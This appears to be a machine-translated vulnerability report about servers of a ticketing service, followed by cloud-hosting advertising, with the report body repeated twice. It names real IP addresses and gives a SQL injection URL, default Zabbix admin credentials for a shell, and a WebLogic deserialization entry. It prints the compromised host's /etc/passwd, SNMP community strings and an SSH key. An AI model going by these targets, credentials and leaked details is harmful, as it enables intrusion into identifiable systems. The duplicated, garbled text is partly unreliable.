Tickets passed Multiple Vulnerabilities (SQL injection, command execution, and deserialization)
Multiple Vulnerabilities (SQL injection, command execution, and deserialization)
1> Injection
URL: http: // 119.254.105.143/ticket/web. go? Method = policyCal & showId = 060671 & seatIds = 10210985 & key = IF4F8DK1IFS891KF9S8FKFD8
The seatIds parameter is injected.
2> zabbix Command Execution
Http: // 119.254.105.222/zabbix/
Admin zabbix
Direct shell
3> java deserialization
Http: // 119.254.105.172: 7001/console/login/LoginForm. jsp
cat /etc/passwdroot:x:0:0:root:/root:/bin/bashbin:x:1:1:bin:/bin:/sbin/nologindaemon:x:2:2:daemon:/sbin:/sbin/nologinadm:x:3:4:adm:/var/adm:/sbin/nologinlp:x:4:7:lp:/var/spool/lpd:/sbin/nologinsync:x:5:0:sync:/sbin:/bin/syncshutdown:x:6:0:shutdown:/sbin:/sbin/shutdownhalt:x:7:0:halt:/sbin:/sbin/haltmail:x:8:12:mail:/var/spool/mail:/sbin/nologinnews:x:9:13:news:/etc/news:uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologinoperator:x:11:0:operator:/root:/sbin/nologingames:x:12:100:games:/usr/games:/sbin/nologingopher:x:13:30:gopher:/var/gopher:/sbin/nologinftp:x:14:50:FTP User:/var/ftp:/sbin/nologinnobody:x:99:99:Nobody:/:/sbin/nologinnscd:x:28:28:NSCD Daemon:/:/sbin/nologinvcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologinpcap:x:77:77::/var/arpwatch:/sbin/nologinntp:x:38:38::/etc/ntp:/sbin/nologindbus:x:81:81:System message bus:/:/sbin/nologinavahi:x:70:70:Avahi daemon:/:/sbin/nologinrpc:x:32:32:Portmapper RPC user:/:/sbin/nologinapache:x:48:48:Apache:/var/www:/sbin/nologinmailnull:x:47:47::/var/spool/mqueue:/sbin/nologinsmmsp:x:51:51::/var/spool/mqueue:/sbin/nologinhsqldb:x:96:96::/var/lib/hsqldb:/sbin/nologinsshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologinxfs:x:43:43:X Font Server:/etc/X11/fs:/sbin/nologinrpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologinnfsnobody:x:65534:65534:Anonymous NFS User:/var/lib/nfs:/sbin/nologinhaldaemon:x:68:68:HAL daemon:/:/sbin/nologinavahi-autoipd:x:100:102:avahi-autoipd:/var/lib/avahi-autoipd:/sbin/nologingdm:x:42:42::/var/gdm:/sbin/nologinjiadd:x:501:501::/home/jiadd:/bin/bashhuangjp:x:502:502::/home/huangjp:/bin/bash
# sec.name source community#com2sec local localhost zypwt#com2sec mynetwork 117.79.227.0/24 zypwt#com2sec mynetwork 192.168.100.0/24 zypwtcom2sec local 119.254.105.128/25 zypwtcom2sec mynetwork 192.168.100.0/24 zypwt#com2sec local 114.255.121.200 123456#com2sec mynetwork 114.255.121.200 123456ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDIIZGTgm3xj/aqujl7utTwLRHU+e/tZv7po3LQio/HkFC3VqfdRiVKHhbTLRPVGAkPQDL2CtZ/Qsi/9spLrladw2K+kFz1CnImsLW+3wBsuqxmIVt+g34IVk7GnT12s2c8YLC9r1ZIr38zBaLF/TGLQO/eEAjNkgiANefibyhCn2qsK0eT3WrQnLW907nB1UABhqxgNz2ijl6jGV7M9TOXUZP7uiFelM79bMqLsXHSXzRQtLrLkq17uNs9Uy5XsbhwNqtGo8AlzlrCxYf0xRQv37PWqzcZIQ4AhmUytv8tHA6SbtvoV+F9FgwDMILzukCfqY3DzYKTEtxMlpcfvb8Z [email protected]
1> Injection
URL: http: // 119.254.105.143/ticket/web. go? Method = policyCal & showId = 060671 & seatIds = 10210985 & key = IF4F8DK1IFS891KF9S8FKFD8
The seatIds parameter is injected.
2> zabbix Command Execution
Http: // 119.254.105.222/zabbix/
Admin zabbix
Direct shell
3> java deserialization
Http: // 119.254.105.172: 7001/console/login/LoginForm. jsp
cat /etc/passwdroot:x:0:0:root:/root:/bin/bashbin:x:1:1:bin:/bin:/sbin/nologindaemon:x:2:2:daemon:/sbin:/sbin/nologinadm:x:3:4:adm:/var/adm:/sbin/nologinlp:x:4:7:lp:/var/spool/lpd:/sbin/nologinsync:x:5:0:sync:/sbin:/bin/syncshutdown:x:6:0:shutdown:/sbin:/sbin/shutdownhalt:x:7:0:halt:/sbin:/sbin/haltmail:x:8:12:mail:/var/spool/mail:/sbin/nologinnews:x:9:13:news:/etc/news:uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologinoperator:x:11:0:operator:/root:/sbin/nologingames:x:12:100:games:/usr/games:/sbin/nologingopher:x:13:30:gopher:/var/gopher:/sbin/nologinftp:x:14:50:FTP User:/var/ftp:/sbin/nologinnobody:x:99:99:Nobody:/:/sbin/nologinnscd:x:28:28:NSCD Daemon:/:/sbin/nologinvcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologinpcap:x:77:77::/var/arpwatch:/sbin/nologinntp:x:38:38::/etc/ntp:/sbin/nologindbus:x:81:81:System message bus:/:/sbin/nologinavahi:x:70:70:Avahi daemon:/:/sbin/nologinrpc:x:32:32:Portmapper RPC user:/:/sbin/nologinapache:x:48:48:Apache:/var/www:/sbin/nologinmailnull:x:47:47::/var/spool/mqueue:/sbin/nologinsmmsp:x:51:51::/var/spool/mqueue:/sbin/nologinhsqldb:x:96:96::/var/lib/hsqldb:/sbin/nologinsshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologinxfs:x:43:43:X Font Server:/etc/X11/fs:/sbin/nologinrpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologinnfsnobody:x:65534:65534:Anonymous NFS User:/var/lib/nfs:/sbin/nologinhaldaemon:x:68:68:HAL daemon:/:/sbin/nologinavahi-autoipd:x:100:102:avahi-autoipd:/var/lib/avahi-autoipd:/sbin/nologingdm:x:42:42::/var/gdm:/sbin/nologinjiadd:x:501:501::/home/jiadd:/bin/bashhuangjp:x:502:502::/home/huangjp:/bin/bash
# sec.name source community#com2sec local localhost zypwt#com2sec mynetwork 117.79.227.0/24 zypwt#com2sec mynetwork 192.168.100.0/24 zypwtcom2sec local 119.254.105.128/25 zypwtcom2sec mynetwork 192.168.100.0/24 zypwt#com2sec local 114.255.121.200 123456#com2sec mynetwork 114.255.121.200 123456ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDIIZGTgm3xj/aqujl7utTwLRHU+e/tZv7po3LQio/HkFC3VqfdRiVKHhbTLRPVGAkPQDL2CtZ/Qsi/9spLrladw2K+kFz1CnImsLW+3wBsuqxmIVt+g34IVk7GnT12s2c8YLC9r1ZIr38zBaLF/TGLQO/eEAjNkgiANefibyhCn2qsK0eT3WrQnLW907nB1UABhqxgNz2ijl6jGV7M9TOXUZP7uiFelM79bMqLsXHSXzRQtLrLkq17uNs9Uy5XsbhwNqtGo8AlzlrCxYf0xRQv37PWqzcZIQ4AhmUytv8tHA6SbtvoV+F9FgwDMILzukCfqY3DzYKTEtxMlpcfvb8Z [email protected]
Start building with 50+ products and up to 12 months usage for Elastic Compute Service
1 on 1 presale consultation
24/7 Technical Support 6 Free Tickets per Quarter Faster Response
Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.
A comprehensive suite of global cloud computing services to power your business
Payment Methods We Support
